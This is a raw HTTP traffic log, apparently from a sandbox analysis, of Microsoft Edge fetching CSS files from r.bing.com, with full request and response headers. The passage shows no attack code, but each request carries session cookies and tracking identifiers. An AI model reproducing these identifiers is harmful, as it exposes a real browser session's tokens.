Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f0a1fb6
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/iaSRX-ryuc5f_9oE3MXJWNBNcYY.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/iaSRX-ryuc5f_9oE3MXJWNBNcYY.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 486
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: rdm2a5LpdWlqFp3IHNpXHQ==
Last-Modified: Sun, 28 Jul 2024 17:34:42 GMT
ETag: 0x8DCAF2B90890FAC
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9c768e34-901e-003e-16ff-1393d3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=74258
Expires: Sun, 06 Oct 2024 12:43:28 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a20a8
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/qd1xHozTDAiLTDmIfvvogDsKAWc.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/qd1xHozTDAiLTDmIfvvogDsKAWc.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Last-Modified: Tue, 29 Aug 2023 20:37:06 GMT
ETag: 0x8DBA8CFB5F71AF8
Akamai-GRN: 0.04071002.1726201203.c7e937c
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Type: text/css; charset=utf-8
Content-MD5: i3TYCJC9Uwg1W3mHoTjxiw==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 21d130f2-f01e-00ae-1380-b8a9bd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 193
Cache-Control: public, no-transform, max-age=43472
Expires: Sun, 06 Oct 2024 04:10:22 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2273
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/tH67fvQiF0nalrIJQQCukA-8_u4.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/tH67fvQiF0nalrIJQQCukA-8_u4.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 231
Content-Type: text/css
Content-Encoding: br
Content-MD5: +FFYHZmrU6b90bor/dTorw==
Last-Modified: Tue, 24 Sep 2024 07:07:06 GMT
ETag: 0x8DCDC677F9E4051
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 14ff9353-501e-0002-7131-16e86a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=315598
Expires: Wed, 09 Oct 2024 07:45:48 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2393
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/HK3JWgw7vGok-S1ZNIRi81ouk9s.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/HK3JWgw7vGok-S1ZNIRi81ouk9s.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1

Response

HTTP/1.1 200 OK

Content-Length: 43
Content-Type: text/css
Content-Encoding: br
Content-MD5: 4oH5ypplzwsNhI0bnzB/6g==
Last-Modified: Tue, 24 Sep 2024 06:07:33 GMT
ETag: 0x8DCDC5F2DEE0BBF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 212ab571-701e-0073-611a-169a53000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=305620
Expires: Wed, 09 Oct 2024 05:01:21 GMT
Date: Sat, 05 Oct 2024 16:07:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144461.f0a24db
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/5W/2VH/cir3,cc,nc/1KKUBDl-P5UnnMr4CFdIc4245kE.css?or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rs/5W/2VH/cir3,cc,nc/1KKUBDl-P5UnnMr4CFdIc4245kE.css?or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 222
Content-Type: text/css; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Mon, 23 Sep 2024 22:41:56 GMT
X-EventID: 66fef15f91444fcf9cc05ddee6d47f60
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0001061B
X-AS-SuppressSetCookie: 1
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-k9aR+TsOOCKAAA923Tc3Ghh1o2O5PuWdx9YveK8sRm8='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=271623
Expires: Tue, 08 Oct 2024 19:32:32 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144328.f0972e6
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/Qo1KJzoRMo31gE9sb--6dyXZlXw.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Qo1KJzoRMo31gE9sb--6dyXZlXw.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 331
Content-Type: text/css
Content-Encoding: br
Content-MD5: 5nc3NlU7Yz3D9I8j7eiMLA==
Last-Modified: Tue, 24 Sep 2024 06:22:17 GMT
ETag: 0x8DCDC613D4BAC04
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 931fad5d-c01e-0025-7007-167223000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=297705
Expires: Wed, 09 Oct 2024 02:47:14 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0972fa
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/icNDaHbrcaIFIZRVzDw7Mn4j_ws.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/icNDaHbrcaIFIZRVzDw7Mn4j_ws.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 272
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: F9yqEyPYdu8JDuYVRbaZ0A==
Last-Modified: Fri, 22 Mar 2024 20:42:14 GMT
ETag: 0x8DC4AB08E6061FA
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5e16a0ae-601e-002a-14ff-13dbbc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=74236
Expires: Sun, 06 Oct 2024 12:42:45 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f09740d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/dVMW5tVdi3_S7aODH6eNGoZMETI.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/dVMW5tVdi3_S7aODH6eNGoZMETI.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
